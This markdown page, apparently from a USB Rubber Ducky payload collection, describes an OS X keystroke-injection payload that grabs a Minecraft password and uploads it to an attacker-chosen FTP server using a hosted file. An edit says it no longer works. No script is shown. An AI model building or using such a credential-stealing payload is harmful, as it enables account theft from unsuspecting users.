abhinavvv03/Rubber-Duckey/Payload---OSX-Grab-Minecraft-Account-Password-and-upload-to-FTP.md

 This is a payload for all of the gamers that dumps the minecraft password and sends it via ftp to the server of your choice.
 Works only on OS X because there aren't a whole lot of practical uses for this other than to prove how insecure some games are.
 Requires a web server, and an ftp server.
 You need to host [this file](https://app.box.com/s/3svc1gvulsqrtusj4eqg) on the root of the webserver (do not change the name or else it won't run)
+**Edit:** No longer works due to authentication method change.
+Still an interesting concept though

     REM Author: Jesse Wallace